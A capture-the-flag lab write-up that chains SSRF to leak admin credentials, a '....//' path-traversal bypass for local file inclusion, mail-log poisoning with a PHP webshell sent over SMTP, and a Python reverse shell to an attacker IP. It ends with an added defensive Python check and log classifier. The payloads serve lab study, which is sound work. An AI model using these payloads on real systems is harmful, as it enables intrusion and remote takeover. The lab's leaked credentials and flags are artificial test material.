2026/4/9 22:27:00
Challenge

Even if it's not accessible from the browser, can you still find a way to capture the flags and sneak into the secret admin panel?

Information gathering

Port scan:

```
nmap -p- 10.80.189.83

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
25/tcp    open  smtp     Postfix smtpd
|_smtp-commands: mail.filepath.lab, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
|_ssl-date: TLS randomness does not represent time
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: UIDL SASL TOP STLS AUTH-RESP-CODE CAPA RESP-CODES PIPELINING
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
143/tcp   open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: SASL-IR ENABLE more IMAP4rev1 post-login ID LOGINDISABLEDA0001 Pre-login OK capabilities IDLE listed STARTTLS LITERAL have LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: SASL-IR ENABLE more AUTH=PLAIN post-login ID AUTH=LOGINA0001 Pre-login OK IMAP4rev1 IDLE listed capabilities LITERAL have LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
995/tcp   open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL SASL(PLAIN LOGIN) TOP USER AUTH-RESP-CODE CAPA RESP-CODES PIPELINING
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
4000/tcp  open  http     Node.js (Express middleware)
|_http-title: Sign In
50000/tcp open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: System Monitoring Portal
Service Info: Host: mail.filepath.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

flag1

On port 4000 we find the following (screenshot). On port 50000 we find the following page: a Sysmon system page, which carries this sentence:

Note: This website is intended for authorized personnel only. Be advised that every action and request within this system is subject to monitoring and logging. Unauthorized access or misuse of this portal will be addressed in accordance with company policies and applicable laws.

There is also a login page. I ran a directory scan: nothing came up on 4000, and nothing much on 50000 either.

Back to port 4000. When we first arrived it went straight to the login page, and I only just noticed the guest account credentials I had overlooked earlier (embarrassing). Log in with them and look around. In the profile view there is a clue: isAdmin. Below it there is a feature where the recommended items show up in the section above, so we guess that the parameters inside it can be modified too. Trying to change the name: it can be changed. So change isAdmin: an extra API feature appears. Visiting it gives the following result, tidied up:

```
Internal API
GET http://127.0.0.1:5000/internal-api HTTP/1.1
Host: 127.0.0.1:5000
Response: { "secretKey": "superSecretKey123", "confidentialInfo": "This is very confidential." }

Get Admins API
GET http://127.0.0.1:5000/getAllAdmins101099991 HTTP/1.1
Host: 127.0.0.1:5000
Response: { "ReviewAppUsername": "admin", "ReviewAppPassword": "xxxxxx", "SysMonAppUsername": "administrator", "SysMonAppPassword": "xxxxxxxxx" }
```

Here we see that to reach port 5000 the request has to be sent from the machine's own IP. After changing isAdmin, the settings page looks like the following (screenshot); clearly this is where we are meant to make the SSRF request. Put the endpoint http://127.0.0.1:5000/internal-api into it and send. The result looks like base64, so decode it:

```
eyJzZWNyZXRLZXkiOiJzdXBlclNlY3JldEtleTEyMyIsImNvbmZpZGVudGlhbEluZm8iOiJUaGlzIGlzIHZlcnkgY29uZmlkZW50aWFsIGluZm9ybWF0aW9uLiBIYW5kbGUgd2l0aCBjYXJlLiJ9
```

Decoded:

```
{"secretKey":"superSecretKey123","confidentialInfo":"This is very confidential information. Handle with care."}
```

From this we infer that after every SSRF request the result is sent, base64 encoded, to the /admin/settings page. Send the admin API endpoint we obtained, http://127.0.0.1:5000/getAllAdmins101099991. Result:

```
eyJSZXZpZXdBcHBVc2VybmFtZSI6ImFkbWluIiwiUmV2aWV3QXBwUGFzc3dvcmQiOiJhZG1pbkAhISEiLCJTeXNNb25BcHBVc2VybmFtZSI6ImFkbWluaXN0cmF0b3IiLCJTeXNNb25BcHBQYXNzd29yZCI6IlMkOSRxazZkIyoqTFFVIn0
```

Decoded:

```
{"ReviewAppUsername":"admin","ReviewAppPassword":"admin@!!!","SysMonAppUsername":"administrator","SysMonAppPassword":"S$9$qk6d#**LQU"}
```

We now have the SysMonApp administrator password and the ReviewApp administrator password:

```
ReviewAppUsername: admin
ReviewAppPassword: admin@!!!
SysMonAppUsername: administrator
SysMonAppPassword: S$9$qk6d#**LQU
```

Log in to the page on port 50000 and get flag1: THM{!50_55Rf_1S_d_k3Y??!}

flag2

Keep browsing. I looked in a lot of places and finally spotted something suspicious in the site's source: note the profile.php here. I tried accessing it, with the following result (screenshot). Promising. Since it isn't rendered directly as an image, maybe a local file read is possible. I tried many approaches and finally found a bypass. Payload:

```
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
```

Looking at the passwd file, there are two users: joshua and charles. I tried reading their private keys; as expected, that didn't work.

Let's take stock. We got from 4000 to 50000, and now we have a local file inclusion in hand, but it seems to have some restrictions on it. Isn't LFI usually chained with things like an image shell from a file upload? With this many services open, could it be that we are meant to include the logs? Try reading the logs of the services above. First SSH (22):

```
http://10.80.189.83:50000/profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/auth.log
```

The mail server:

```
http://10.80.189.83:50000/profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/mail.log
```

I tried writing a shell via SSH; it didn't work, there is a restriction and the log shows no record. Switch to the mail server and connect with nc:

```
nc -nv 10.80.189.83 25
```

Try writing the shell:

```
HELO attacker.com
MAIL FROM:test@test.com
RCPT TO:<?php system($_GET['cmd']); ?>
DATA
Subject: Test Log Injection
This is a test.
.
QUIT
```

Check the log:

```
http://10.80.189.83:50000/profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/mail.log&cmd=id
```

It reads successfully. Now try a reverse shell. On the attacking host (its IP):

```
nc -lvnp 4444
```

I tried a few reverse shells; in the end the Python one came back:

```
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.80.103.9",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
```

Under here there is a really long file. Get the final flag: THM{505eb0fb8a9f32853b4d955e1f9123ea}
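As an added defender-side example (not part of the original writeup or the room), here is a Python model of the two things the flag2 section turns on: a sanitizer that deletes "../" once, which is why "....//" survives it, beside a canonical-path check that does not care how the traversal was spelled; plus a pass over constructed Apache access-log lines that flags the traversal and the cmd= follow-up. IMG_ROOT and the log lines are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit
# Hypothetical directory that profile.php?img= is meant to serve from (assumption).
IMG_ROOT = os.path.realpath("/var/www/html/images")
TRAVERSAL_RE = re.compile(r"\.{2,}[/\\]|%2e%2e", re.IGNORECASE)

def naive_strip(img: str) -> str:
    # Broken sanitizer the writeup bypasses: one non-recursive '../' deletion,
    # so '....//' collapses back to '../' after the single pass.
    return img.replace("../", "")

def resolve_under_root(img: str):
    """Canonicalise IMG_ROOT/img and accept it only if it stays inside IMG_ROOT;
    the check runs on the resolved path, so the spelling of '..' is irrelevant."""
    candidate = os.path.realpath(os.path.join(IMG_ROOT, img))
    if candidate == IMG_ROOT or candidate.startswith(IMG_ROOT + os.sep):
        return candidate
    return None

# Constructed Apache access-log lines modelled on the requests in the writeup.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Apr/2026:22:27:00 +0000] "GET /profile.php?img=avatar.png HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Apr/2026:22:28:10 +0000] "GET /profile.php?img=....//....//....//etc/passwd HTTP/1.1" 200 2034',
    '10.0.0.9 - - [09/Apr/2026:22:29:45 +0000] "GET /profile.php?img=....//....//....//var/log/mail.log&cmd=id HTTP/1.1" 200 9120',
]
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def classify_log(lines):
    """Return (request_target, reasons) for requests whose img looks like traversal,
    escapes IMG_ROOT once the naive filter has run, or carries a stray cmd parameter."""
    findings = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        params = parse_qs(urlsplit(target).query)
        img = params.get("img", [""])[0]
        reasons = []
        if TRAVERSAL_RE.search(img):
            reasons.append("traversal pattern in img")
        if resolve_under_root(naive_strip(img)) is None:
            reasons.append("escapes image root after naive filter")
        if "cmd" in params:
            reasons.append("unexpected cmd parameter")
        if reasons:
            findings.append((target, reasons))
    return findings
```

Note that the raw "....//" string is harmless to resolve_under_root on its own (it names a directory literally called "...."); it only becomes "../" because the naive filter rewrites it, which is why the log check runs the filter first.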
